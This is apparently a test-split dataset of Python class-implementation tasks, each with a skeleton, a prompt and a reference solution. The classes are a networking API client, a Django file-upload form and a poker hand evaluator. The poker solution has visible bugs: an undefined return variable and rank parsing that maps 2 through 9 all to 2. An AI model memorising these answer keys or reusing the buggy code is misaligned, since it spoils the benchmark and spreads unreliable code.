tenant_id=tenant_id)\n resp = self.request('PUT', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_2|>\n\n<|body_start_3|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('GET', url, response_entity_type=Network, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_3|>\n\n<|body_start_4|>\n params = {'id': network_id, 'name': name, 'status': status, 'admin_state_up': admin_state_up, 'shared': shared, 'tenant_id': tenant_id, 'limit': limit, 'marker': marker, 'page_reverse': page_reverse}\n url = '{base_url}/networks'.format(base_url=self.url)\n resp = self.request('GET', url, params=params, response_entity_type=Networks, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_4|>\n\n<|body_start_5|>\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('DELETE', url, requestslib_kwargs=requestslib_kwargs)\n return resp\n<|end_body_5|>\n", "revision_id": "7d49cf6bfd7e1a6e5b739e7de52f2e18e5ccf924", "skeleton": "<|skeleton|>\nclass NetworksClient:\n\n def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None):\n \"\"\"@param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\"\"\"\n <|body_0|>\n\n def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\"\"\"\n <|body_1|>\n\n def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. 
(CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\"\"\"\n <|body_2|>\n\n def get_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\"\"\"\n <|body_3|>\n\n def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None):\n \"\"\"@summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\"\"\"\n <|body_4|>\n\n def delete_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: Requests.response\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NetworksClient:\n def __init__(self, url, auth_token, serialize_format=None, deserialize_format=None, tenant_id=None):\n \"\"\"@param url: Base URL for the networks service @type url: string @param auth_token: Auth token to be used for all requests @type auth_token: string @param serialize_format: Format for serializing requests @type serialize_format: string @param deserialize_format: Format for de-serializing responses @type deserialize_format: string @param tenant_id: optional tenant id to be included in the header if given @type tenant_id: string\"\"\"\n super(NetworksClient, self).__init__(serialize_format, deserialize_format)\n self.auth_token = auth_token\n self.default_headers['X-Auth-Token'] = auth_token\n ct = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.serialize_format)\n accept = '{content_type}/{content_subtype}'.format(content_type='application', content_subtype=self.deserialize_format)\n self.default_headers['Content-Type'] = ct\n self.default_headers['Accept'] = accept\n if tenant_id:\n self.default_headers['X-Auth-Project-Id'] = tenant_id\n self.url = url\n\n def create_network(self, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Creates a Network @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. 
(CRUD: CR) @type tenant_id: string @return: network create response @rtype: Requests.response\"\"\"\n url = '{base_url}/networks'.format(base_url=self.url)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('POST', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n\n def update_network(self, network_id, name=None, admin_state_up=None, shared=None, tenant_id=None, requestslib_kwargs=None):\n \"\"\"@summary: Updates a specified Network @param network_id: The UUID for the network @type network_id: string @param name: human readable name for the network, may not be unique. (CRUD: CRU) @type name: string @param admin_state_up: true or false, the admin state of the network. If down, the network does not forward packets. Default value is True (CRUD: CRU) @type admin_state_up: bool @param shared: specifies if the network can be accessed by any tenant. Default value is False. (CRUD: CRU) @type shared: bool @param tenant_id: owner of the network. (CRUD: CR) @type tenant_id: string @return: update network response @rtype: Requests.response\"\"\"\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n request = NetworkRequest(name=name, admin_state_up=admin_state_up, shared=shared, tenant_id=tenant_id)\n resp = self.request('PUT', url, response_entity_type=Network, request_entity=request, requestslib_kwargs=requestslib_kwargs)\n return resp\n\n def get_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Shows information for a specified network @param network_id: The UUID for the network @type network_id: string @return: get network response @rtype: Requests.response\"\"\"\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('GET', url, response_entity_type=Network, requestslib_kwargs=requestslib_kwargs)\n return resp\n\n def list_networks(self, network_id=None, name=None, status=None, admin_state_up=None, shared=None, tenant_id=None, limit=None, marker=None, page_reverse=None, requestslib_kwargs=None):\n \"\"\"@summary: Lists networks, filtered by params if given @param network_id: network ID to filter by @type network_id: string @param name: network name to filter by @type name: string @param status: network status to filter by @type status: string @param admin_state_up: Admin state of the network to filter by @type admin_state_up: bool @param shared: If network is shared across tenants status to filter by @type shared: bool @param tenant_id: tenant ID network owner to filter by @type tenant_id: string @param limit: page size @type limit: int @param marker: Id of the last item of the previous page @type marker: string @param page_reverse: direction of the page @type page_reverse: bool @return: li\"\"\"\n params = {'id': network_id, 'name': name, 'status': status, 'admin_state_up': admin_state_up, 'shared': shared, 'tenant_id': tenant_id, 'limit': limit, 'marker': marker, 'page_reverse': page_reverse}\n url = '{base_url}/networks'.format(base_url=self.url)\n resp = self.request('GET', url, params=params, response_entity_type=Networks, requestslib_kwargs=requestslib_kwargs)\n return resp\n\n def delete_network(self, network_id, requestslib_kwargs=None):\n \"\"\"@summary: Deletes a specified network and its associated resources @param network_id: The UUID for the network @type network_id: string @return: delete network response @rtype: 
Requests.response\"\"\"\n url = '{base_url}/networks/{network_id}'.format(base_url=self.url, network_id=network_id)\n resp = self.request('DELETE', url, requestslib_kwargs=requestslib_kwargs)\n return resp\n", "source": "the_stack_v2_python_sparse", "source_path": "cloudcafe/networking/networks/networks_api/client.py", "source_repo": "kurhula/cloudcafe", "split": "test", "star_events_count": 0} {"blob_id": "14b0ec57320083bc44b3a228ac206941b7b9e587", "bodies": ["files = self.files.getlist('file_field')\nfor file in files:\n validators.validate_filename(file.name)\n if not file:\n raise forms.ValidationError('Could not read file: %(file_name)s', params={'file_name': file.name})\nfor file in files:\n if file.size > ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT:\n raise forms.ValidationError('File %(file_name)s is larger than the individual size limit: %(individual_size_limit)s', code='exceed_individual_limit', params={'file_name': file.name, 'individual_size_limit': utility.readable_size(ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT)})\nif sum((f.size for f in files)) > self.project.core_project.storage_allowance - self.project.storage_used():\n raise forms.ValidationError('Total upload volume exceeds remaining quota', code='exceed_remaining_quota')\nreturn files", "errors = ErrorList()\nfor file in self.files.getlist('file_field'):\n try:\n utility.write_uploaded_file(file=file, overwrite=False, write_file_path=os.path.join(self.file_dir, file.name))\n except FileExistsError:\n errors.append(format_html('Item named {} already exists', file.name))\n except OSError:\n errors.append(format_html('Unable to upload {}', file.name))\nreturn ('Your files have been uploaded', errors)"], "bodies_text": "<|body_start_0|>\n files = self.files.getlist('file_field')\n for file in files:\n validators.validate_filename(file.name)\n if not file:\n raise forms.ValidationError('Could not read file: %(file_name)s', params={'file_name': file.name})\n for file in files:\n if file.size > ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT:\n raise forms.ValidationError('File %(file_name)s is larger than the individual size limit: %(individual_size_limit)s', code='exceed_individual_limit', params={'file_name': file.name, 'individual_size_limit': utility.readable_size(ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT)})\n if sum((f.size for f in files)) > self.project.core_project.storage_allowance - self.project.storage_used():\n raise forms.ValidationError('Total upload volume exceeds remaining quota', code='exceed_remaining_quota')\n return files\n<|end_body_0|>\n\n<|body_start_1|>\n errors = ErrorList()\n for file in self.files.getlist('file_field'):\n try:\n utility.write_uploaded_file(file=file, overwrite=False, write_file_path=os.path.join(self.file_dir, file.name))\n except FileExistsError:\n errors.append(format_html('Item named {} already exists', file.name))\n except OSError:\n errors.append(format_html('Unable to upload {}', file.name))\n return ('Your files have been uploaded', errors)\n<|end_body_1|>\n", "class_docstring": "Form for uploading multiple files to a project. `subdir` is the project subdirectory relative to the file root.", "class_name": "UploadFilesForm", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UploadFilesForm:\n \"\"\"Form for uploading multiple files to a project. 
`subdir` is the project subdirectory relative to the file root.\"\"\"\n\n def clean_file_field(self):\n \"\"\"Check for file name, size limits and whether they are readable\"\"\"\n <|body_0|>\n\n def perform_action(self):\n \"\"\"Upload the files\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n files = self.files.getlist('file_field')\n for file in files:\n validators.validate_filename(file.name)\n if not file:\n raise forms.ValidationError('Could not read file: %(file_name)s', params={'file_name': file.name})\n for file in files:\n if file.size > ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT:\n raise forms.ValidationError('File %(file_name)s is larger than the individual size limit: %(individual_size_limit)s', code='exceed_individual_limit', params={'file_name': file.name, 'individual_size_limit': utility.readable_size(ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT)})\n if sum((f.size for f in files)) > self.project.core_project.storage_allowance - self.project.storage_used():\n raise forms.ValidationError('Total upload volume exceeds remaining quota', code='exceed_remaining_quota')\n return files\n<|end_body_0|>\n\n<|body_start_1|>\n errors = ErrorList()\n for file in self.files.getlist('file_field'):\n try:\n utility.write_uploaded_file(file=file, overwrite=False, write_file_path=os.path.join(self.file_dir, file.name))\n except FileExistsError:\n errors.append(format_html('Item named {} already exists', file.name))\n except OSError:\n errors.append(format_html('Unable to upload {}', file.name))\n return ('Your files have been uploaded', errors)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000259", "length_bytes": 39361, "license_type": "permissive", "methods": [{"docstring": "Check for file name, size limits and whether they are readable", "name": "clean_file_field", "signature": "def clean_file_field(self)"}, {"docstring": "Upload the files", "name": "perform_action", "signature": "def perform_action(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001029", "prompt": "Implement the Python class `UploadFilesForm` described below.\n\nClass description:\nForm for uploading multiple files to a project. `subdir` is the project subdirectory relative to the file root.\n\nMethod signatures and docstrings:\n- def clean_file_field(self): Check for file name, size limits and whether they are readable\n- def perform_action(self): Upload the files", "prompted_full_text": "Implement the Python class `UploadFilesForm` described below.\n\nClass description:\nForm for uploading multiple files to a project. `subdir` is the project subdirectory relative to the file root.\n\nMethod signatures and docstrings:\n- def clean_file_field(self): Check for file name, size limits and whether they are readable\n- def perform_action(self): Upload the files\n\n<|skeleton|>\nclass UploadFilesForm:\n \"\"\"Form for uploading multiple files to a project. 
`subdir` is the project subdirectory relative to the file root.\"\"\"\n\n def clean_file_field(self):\n \"\"\"Check for file name, size limits and whether they are readable\"\"\"\n <|body_0|>\n\n def perform_action(self):\n \"\"\"Upload the files\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n files = self.files.getlist('file_field')\n for file in files:\n validators.validate_filename(file.name)\n if not file:\n raise forms.ValidationError('Could not read file: %(file_name)s', params={'file_name': file.name})\n for file in files:\n if file.size > ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT:\n raise forms.ValidationError('File %(file_name)s is larger than the individual size limit: %(individual_size_limit)s', code='exceed_individual_limit', params={'file_name': file.name, 'individual_size_limit': utility.readable_size(ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT)})\n if sum((f.size for f in files)) > self.project.core_project.storage_allowance - self.project.storage_used():\n raise forms.ValidationError('Total upload volume exceeds remaining quota', code='exceed_remaining_quota')\n return files\n<|end_body_0|>\n\n<|body_start_1|>\n errors = ErrorList()\n for file in self.files.getlist('file_field'):\n try:\n utility.write_uploaded_file(file=file, overwrite=False, write_file_path=os.path.join(self.file_dir, file.name))\n except FileExistsError:\n errors.append(format_html('Item named {} already exists', file.name))\n except OSError:\n errors.append(format_html('Unable to upload {}', file.name))\n return ('Your files have been uploaded', errors)\n<|end_body_1|>\n", "revision_id": "e7c8ed0b07a4c9a1b4007f6089f59aafa6a3ac57", "skeleton": "<|skeleton|>\nclass UploadFilesForm:\n \"\"\"Form for uploading multiple files to a project. `subdir` is the project subdirectory relative to the file root.\"\"\"\n\n def clean_file_field(self):\n \"\"\"Check for file name, size limits and whether they are readable\"\"\"\n <|body_0|>\n\n def perform_action(self):\n \"\"\"Upload the files\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UploadFilesForm:\n \"\"\"Form for uploading multiple files to a project. 
`subdir` is the project subdirectory relative to the file root.\"\"\"\n\n def clean_file_field(self):\n \"\"\"Check for file name, size limits and whether they are readable\"\"\"\n files = self.files.getlist('file_field')\n for file in files:\n validators.validate_filename(file.name)\n if not file:\n raise forms.ValidationError('Could not read file: %(file_name)s', params={'file_name': file.name})\n for file in files:\n if file.size > ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT:\n raise forms.ValidationError('File %(file_name)s is larger than the individual size limit: %(individual_size_limit)s', code='exceed_individual_limit', params={'file_name': file.name, 'individual_size_limit': utility.readable_size(ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT)})\n if sum((f.size for f in files)) > self.project.core_project.storage_allowance - self.project.storage_used():\n raise forms.ValidationError('Total upload volume exceeds remaining quota', code='exceed_remaining_quota')\n return files\n\n def perform_action(self):\n \"\"\"Upload the files\"\"\"\n errors = ErrorList()\n for file in self.files.getlist('file_field'):\n try:\n utility.write_uploaded_file(file=file, overwrite=False, write_file_path=os.path.join(self.file_dir, file.name))\n except FileExistsError:\n errors.append(format_html('Item named {} already exists', file.name))\n except OSError:\n errors.append(format_html('Unable to upload {}', file.name))\n return ('Your files have been uploaded', errors)\n", "source": "the_stack_v2_python_sparse", "source_path": "physionet-django/project/forms.py", "source_repo": "tompollard/physionet-build", "split": "test", "star_events_count": 0} {"blob_id": "0065df9a1007f8b9f414d5b55e3390e3d54092bf", "bodies": ["if isinstance(card, basestring):\n return card\nreturn card.__str__()", "if isinstance(card_string, Card):\n return card\nrank_str = card_string[0].lower()\nsuit_str = card_string[1].lower()\nrank = 2\nsuit = 1\nif rank_str == 't':\n rank = 10\nelif rank_str == 'j':\n rank = 11\nelif rank_str == 'q':\n rank = 12\nelif rank_str == 'k':\n rank = 13\nelif rank_str == 'a':\n rank = 14\nif suit_str == 's':\n suit = 1\nelif suit_str == 'h':\n suit = 2\nelif suit_str == 'd':\n suit = 3\nelif suit_str == 'c':\n suit = 4\nreturn Card(rank, suit)", "if len(board) == 5:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board)\nelif len(board) == 0:\n if hand[0].suit == hand[1].suit:\n return HandEvaluator.preflop_win_percentages_suited[hand[0].rank][hand[1].rank]\n else:\n return HandEvaluator.preflop_win_percentages_unsuited[hand[0].rank][hand[1].rank]\nelse:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n for i in xrange(5 - len(board)):\n board.append(255)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board, iterations=iterations)\nreturn (poker_eval_result['eval'][0]['winhi'] + 0.5 * poker_eval_result['eval'][0]['tiehi']) / float(poker_eval_result['info'][0])"], "bodies_text": "<|body_start_0|>\n if isinstance(card, basestring):\n return card\n return card.__str__()\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(card_string, Card):\n return card\n rank_str = card_string[0].lower()\n suit_str = card_string[1].lower()\n rank = 2\n suit = 1\n if rank_str == 't':\n rank = 10\n elif rank_str == 'j':\n rank = 11\n elif rank_str == 'q':\n 
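The UploadFilesForm record that closes on this line enforces two independent caps: each file is checked against a per-file limit, then the batch total is checked against the remaining quota, computed as the core project's storage allowance minus storage already used. (Note the record validates each filename before its `if not file:` readability check, so an empty upload still gets its name validated first; harmless, but easy to misread.) A standalone sketch of the two-tier check, with a purely illustrative limit value in place of `ActiveProject.INDIVIDUAL_FILE_SIZE_LIMIT`:

    # Standalone sketch of the two-tier upload limit: per-file cap first,
    # then batch total against the remaining quota.
    INDIVIDUAL_FILE_SIZE_LIMIT = 5 * 1024 ** 3  # illustrative value only

    def check_upload(sizes, storage_allowance, storage_used):
        for size in sizes:
            if size > INDIVIDUAL_FILE_SIZE_LIMIT:
                raise ValueError('file exceeds individual size limit')
        if sum(sizes) > storage_allowance - storage_used:
            raise ValueError('total upload volume exceeds remaining quota')

    check_upload([100, 200], storage_allowance=1000, storage_used=500)  # ok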
rank = 12\n elif rank_str == 'k':\n rank = 13\n elif rank_str == 'a':\n rank = 14\n if suit_str == 's':\n suit = 1\n elif suit_str == 'h':\n suit = 2\n elif suit_str == 'd':\n suit = 3\n elif suit_str == 'c':\n suit = 4\n return Card(rank, suit)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(board) == 5:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board)\n elif len(board) == 0:\n if hand[0].suit == hand[1].suit:\n return HandEvaluator.preflop_win_percentages_suited[hand[0].rank][hand[1].rank]\n else:\n return HandEvaluator.preflop_win_percentages_unsuited[hand[0].rank][hand[1].rank]\n else:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n for i in xrange(5 - len(board)):\n board.append(255)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board, iterations=iterations)\n return (poker_eval_result['eval'][0]['winhi'] + 0.5 * poker_eval_result['eval'][0]['tiehi']) / float(poker_eval_result['info'][0])\n<|end_body_2|>\n", "class_docstring": "", "class_name": "HandEvaluator", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass HandEvaluator:\n\n def card_to_str(card):\n \"\"\"Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!\"\"\"\n <|body_0|>\n\n def str_to_card(card_string):\n \"\"\"Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\"\"\"\n <|body_1|>\n\n def evaluate_hand(hand, board=[], iterations=1000):\n \"\"\"Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. 
Arguments: hand: your hand board: the board if any iterations: number of times to simulate\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if isinstance(card, basestring):\n return card\n return card.__str__()\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(card_string, Card):\n return card\n rank_str = card_string[0].lower()\n suit_str = card_string[1].lower()\n rank = 2\n suit = 1\n if rank_str == 't':\n rank = 10\n elif rank_str == 'j':\n rank = 11\n elif rank_str == 'q':\n rank = 12\n elif rank_str == 'k':\n rank = 13\n elif rank_str == 'a':\n rank = 14\n if suit_str == 's':\n suit = 1\n elif suit_str == 'h':\n suit = 2\n elif suit_str == 'd':\n suit = 3\n elif suit_str == 'c':\n suit = 4\n return Card(rank, suit)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(board) == 5:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board)\n elif len(board) == 0:\n if hand[0].suit == hand[1].suit:\n return HandEvaluator.preflop_win_percentages_suited[hand[0].rank][hand[1].rank]\n else:\n return HandEvaluator.preflop_win_percentages_unsuited[hand[0].rank][hand[1].rank]\n else:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n for i in xrange(5 - len(board)):\n board.append(255)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board, iterations=iterations)\n return (poker_eval_result['eval'][0]['winhi'] + 0.5 * poker_eval_result['eval'][0]['tiehi']) / float(poker_eval_result['info'][0])\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000260", "length_bytes": 6777, "license_type": "no_license", "methods": [{"docstring": "Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!", "name": "card_to_str", "signature": "def card_to_str(card)"}, {"docstring": "Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!", "name": "str_to_card", "signature": "def str_to_card(card_string)"}, {"docstring": "Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. Arguments: hand: your hand board: the board if any iterations: number of times to simulate", "name": "evaluate_hand", "signature": "def evaluate_hand(hand, board=[], iterations=1000)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_val_000115", "prompt": "Implement the Python class `HandEvaluator` described below.\n\nClass description:\nImplement the HandEvaluator class.\n\nMethod signatures and docstrings:\n- def card_to_str(card): Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!\n- def str_to_card(card_string): Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\n- def evaluate_hand(hand, board=[], iterations=1000): Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. 
Arguments: hand: your hand board: the board if any iterations: number of times to simulate", "prompted_full_text": "Implement the Python class `HandEvaluator` described below.\n\nClass description:\nImplement the HandEvaluator class.\n\nMethod signatures and docstrings:\n- def card_to_str(card): Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!\n- def str_to_card(card_string): Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\n- def evaluate_hand(hand, board=[], iterations=1000): Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. Arguments: hand: your hand board: the board if any iterations: number of times to simulate\n\n<|skeleton|>\nclass HandEvaluator:\n\n def card_to_str(card):\n \"\"\"Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!\"\"\"\n <|body_0|>\n\n def str_to_card(card_string):\n \"\"\"Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\"\"\"\n <|body_1|>\n\n def evaluate_hand(hand, board=[], iterations=1000):\n \"\"\"Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. Arguments: hand: your hand board: the board if any iterations: number of times to simulate\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if isinstance(card, basestring):\n return card\n return card.__str__()\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(card_string, Card):\n return card\n rank_str = card_string[0].lower()\n suit_str = card_string[1].lower()\n rank = 2\n suit = 1\n if rank_str == 't':\n rank = 10\n elif rank_str == 'j':\n rank = 11\n elif rank_str == 'q':\n rank = 12\n elif rank_str == 'k':\n rank = 13\n elif rank_str == 'a':\n rank = 14\n if suit_str == 's':\n suit = 1\n elif suit_str == 'h':\n suit = 2\n elif suit_str == 'd':\n suit = 3\n elif suit_str == 'c':\n suit = 4\n return Card(rank, suit)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(board) == 5:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board)\n elif len(board) == 0:\n if hand[0].suit == hand[1].suit:\n return HandEvaluator.preflop_win_percentages_suited[hand[0].rank][hand[1].rank]\n else:\n return HandEvaluator.preflop_win_percentages_unsuited[hand[0].rank][hand[1].rank]\n else:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n for i in xrange(5 - len(board)):\n board.append(255)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board, iterations=iterations)\n return (poker_eval_result['eval'][0]['winhi'] + 0.5 * poker_eval_result['eval'][0]['tiehi']) / float(poker_eval_result['info'][0])\n<|end_body_2|>\n", "revision_id": "72dc7adac6f15cb070c3641ca9de34fcf67bcf0a", "skeleton": "<|skeleton|>\nclass HandEvaluator:\n\n def card_to_str(card):\n \"\"\"Convert this card to a string or number for pypoker-eval. 
Note that I don't check whether you passed a Card or the right string format!\"\"\"\n <|body_0|>\n\n def str_to_card(card_string):\n \"\"\"Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\"\"\"\n <|body_1|>\n\n def evaluate_hand(hand, board=[], iterations=1000):\n \"\"\"Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. Arguments: hand: your hand board: the board if any iterations: number of times to simulate\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class HandEvaluator:\n def card_to_str(card):\n \"\"\"Convert this card to a string or number for pypoker-eval. Note that I don't check whether you passed a Card or the right string format!\"\"\"\n if isinstance(card, basestring):\n return card\n return card.__str__()\n\n def str_to_card(card_string):\n \"\"\"Convert this string to a pokerbots.engine.game.Card instance. Note that I don't check whether or not you passed the right format!\"\"\"\n if isinstance(card_string, Card):\n return card\n rank_str = card_string[0].lower()\n suit_str = card_string[1].lower()\n rank = 2\n suit = 1\n if rank_str == 't':\n rank = 10\n elif rank_str == 'j':\n rank = 11\n elif rank_str == 'q':\n rank = 12\n elif rank_str == 'k':\n rank = 13\n elif rank_str == 'a':\n rank = 14\n if suit_str == 's':\n suit = 1\n elif suit_str == 'h':\n suit = 2\n elif suit_str == 'd':\n suit = 3\n elif suit_str == 'c':\n suit = 4\n return Card(rank, suit)\n\n def evaluate_hand(hand, board=[], iterations=1000):\n \"\"\"Return winning percentage of your hand, with ties counted as 0.5 Includes Monte-Carlo simulation of running the board. Includes trying all possible opponent hands. 
Arguments: hand: your hand board: the board if any iterations: number of times to simulate\"\"\"\n if len(board) == 5:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board)\n elif len(board) == 0:\n if hand[0].suit == hand[1].suit:\n return HandEvaluator.preflop_win_percentages_suited[hand[0].rank][hand[1].rank]\n else:\n return HandEvaluator.preflop_win_percentages_unsuited[hand[0].rank][hand[1].rank]\n else:\n hand = map(HandEvaluator.card_to_str, hand)\n board = map(HandEvaluator.card_to_str, board)\n for i in xrange(5 - len(board)):\n board.append(255)\n poker_eval_result = HandEvaluator.evaluator.poker_eval(game='holdem', pockets=[hand, [255, 255]], dead=[], board=board, iterations=iterations)\n return (poker_eval_result['eval'][0]['winhi'] + 0.5 * poker_eval_result['eval'][0]['tiehi']) / float(poker_eval_result['info'][0])\n", "source": "the_stack_v2_python_sparse", "source_path": "pokerbots/player/hand_evaluator.py", "source_repo": "aliang/notpoker", "split": "test", "star_events_count": 2} {"blob_id": "e7c1fb90c281338f6e931ca65df2a9696017fd46", "bodies": ["import bisect\n\ndef Count(num, 